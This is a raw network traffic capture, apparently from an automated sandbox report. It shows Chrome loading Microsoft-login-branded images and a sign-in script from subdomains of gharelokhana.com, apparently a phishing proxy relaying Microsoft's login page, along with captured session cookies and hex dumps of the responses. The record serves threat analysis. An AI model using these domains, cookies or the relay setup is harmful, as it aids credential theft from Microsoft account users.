                                                2024-12-05 07:24:25 UTC1744INData Raw: f1 52 5d dc 21 f5 96 3e e1 22 71 2f 2a 7b 18 88 3a 9d 05 0e ff 21 63 97 5c 35 c2 0b 74 7a 69 93 42 f2 69 9f c4 51 c5 dd f5 68 1d 41 b9 eb 40 16 68 13 41 a6 9f 2a 04 ef 01 c0 48 16 c3 71 68 29 94 26 c3 8a ee 38 9e 7d 50 5a f6 83 d2 b2 1f 54 2f fb c1 d2 b2 af 1e f7 2b 16 b5 bd 73 a8 49 a9 d4 ff a4 d1 70 df 19 9a ce 3f e1 e9 f0 5c e9 e8 09 b9 2a ca 7b bc 9f 5c 25 86 f1 7e 76 95 b0 c5 fb e0 4a 99 b5 f7 79 71 9f 67 92 ff 4a db 97 3f 45 9b 6c 59 ff 59 2a a2 f7 ee 34 71 88 7e bb 89 c3 6f 30 6e a0 be 54 d8 37 c8 de 14 cc 1c 28 f3 ef b7 74 28 8e 74 f1 97 d6 dd 5f 5a 77 45 ad bb b2 61 d0 9f 60 fa 92 fd 27 cc 14 fe 32 ac f9 2f 32 ac e9 6c 6c 3f 66 cb 1a 72 ca 31 95 ee 36 26 d2 9e 66 b6 c2 58 66 a5 19 f0 83 4d 64 81 71 cd 8a 26 31 c2 03 82 6f ed b6 36 5b 1b 1d e9 92
                                                Data Ascii: R]!>"q/*{:!c\5tziBiQhA@hA*Hqh)&8}PZT/+sIp?\*{\%~vJyqgJ?ElYY*4q~o0nT7(t(t_ZwEa`'2/2ll?fr16&fXfMdq&1o6[


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.549902164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:23 UTC804OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:24 UTC755INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:24 GMT
                                                Content-Type: image/gif
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                etag: 0x8DB5C3F4904824B
                                                x-ms-request-id: aa2ece26-e01e-004f-52d0-448daf000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072424Z-15b54885d96644sphC1FRAnatc00000008600000000004hv
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                2024-12-05 07:24:24 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                                Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                                2024-12-05 07:24:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.549908164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:26 UTC553OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:27 UTC755INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:26 GMT
                                                Content-Type: image/gif
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                etag: 0x8DB5C3F4904824B
                                                x-ms-request-id: aa2ece26-e01e-004f-52d0-448daf000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072426Z-15b54885d96nhnjlhC1FRAhha80000000850000000003zca
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                2024-12-05 07:24:27 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                                Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                                2024-12-05 07:24:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.2.549909164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:26 UTC791OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:27 UTC764INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:27 GMT
                                                Content-Type: image/x-icon
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                etag: 0x8D8731230C851A6
                                                x-ms-request-id: 7c4a7895-801e-0052-0bd0-44c801000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072426Z-15b54885d96tt466hC1FRAvn9s000000074g00000000u574
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                2024-12-05 07:24:27 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                                Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                                2024-12-05 07:24:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                35192.168.2.549911164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:26 UTC571OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:27 UTC811INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:26 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 5538
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                etag: 0x8DCBD531731891C
                                                x-ms-request-id: ea82cd89-201e-0050-52d0-443eab000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072426Z-15b54885d96kqd6bhC1FRAcz8g00000007d0000000007mem
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:27 UTC5538INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 5b 7d 77 9b 46 d6 ff 7f 3f 05 62 f7 28 b0 19 63 bb 69 9b 16 97 fa 38 7a 49 d4 da b1 6b c9 ed 66 93 1c 1d 24 46 12 31 02 ca 20 db aa a5 ef fe fc ee 0c 08 24 21 d9 e9 b3 3d a9 31 33 77 ee dc b9 73 df 2f 3e fc 77 ed 1f da bf b5 83 e7 ff a7 75 7b 67 d7 3d ed b2 ad f5 de 75 ae 9b da 15 de 3e 68 ef 2f 7b 9d 46 eb f9 78 68 53 fa bf 37 f1 85 36 f2 03 ae e1 39 70 05 f7 b4 28 d4 a2 44 f3 c3 61 94 c4 51 e2 a6 5c 68 53 fc 4c 7c 37 d0 46 49 34 d5 d2 09 d7 e2 24 fa c2 87 a9 d0 02 5f a4 58 34 e0 41 74 af 19 40 97 78 da 95 9b a4 73 ad 73 65 5a c0 cf 81 cd 1f fb 21 56 0f a3 78 8e df 27 a9 16 46 a9 3f e4 9a 1b 7a 12 5b 80 97 50 70 6d 16 7a 3c d1 ee 27 fe 70 a2 5d f8 c3 24 12 d1 28 d5 12 3e e4 fe 1d 36 11 33 8c af 6f c1 34 37 e1 9a e0 a9 36
                                                Data Ascii: [}wF?b(ci8zIkf$F1 $!=13ws/>wu{g=u>h/{FxhS769p(DaQ\hSL|7FI4$_X4At@xsseZ!Vx'F?z[Ppmz<'p]$(>63o476


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.549910164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:26 UTC804OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:27 UTC806INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:26 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:46 GMT
                                                etag: 0x8DB5C3F47E260FD
                                                x-ms-request-id: 1abd9bcf-c01e-003a-2ed0-44e683000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072426Z-15b54885d96644sphC1FRAnatc000000085g0000000022xh
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:27 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                                Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                                2024-12-05 07:24:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.2.549912164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:26 UTC805OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:27 UTC806INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:26 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                etag: 0x8DB5C3F4911527F
                                                x-ms-request-id: 4bc049a9-a01e-0003-5c9b-461d9f000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072426Z-15d6f6465c8wbqgkhC1DUS8p6c00000000n0000000003pve
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:27 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                                Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                                2024-12-05 07:24:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.2.549913164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:26 UTC559OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:27 UTC761INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:26 GMT
                                                Content-Type: image/gif
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:47 GMT
                                                etag: 0x8DB5C3F48EC4154
                                                x-ms-request-id: 6132c721-501e-0004-551a-434e51000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072426Z-15b54885d96pvbqdhC1FRApzxc00000007vg00000000741n
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                2024-12-05 07:24:27 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                                Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                                2024-12-05 07:24:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.2.549920164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:28 UTC808OUTGET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0
                                                Sec-WebSocket-Key: dQbDjazzT9LZ7NLXFmpahA==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-12-05 07:24:28 UTC743INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:28 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: private
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: 487fd881-0237-4efa-abe9-0c41dd2e2b00
                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
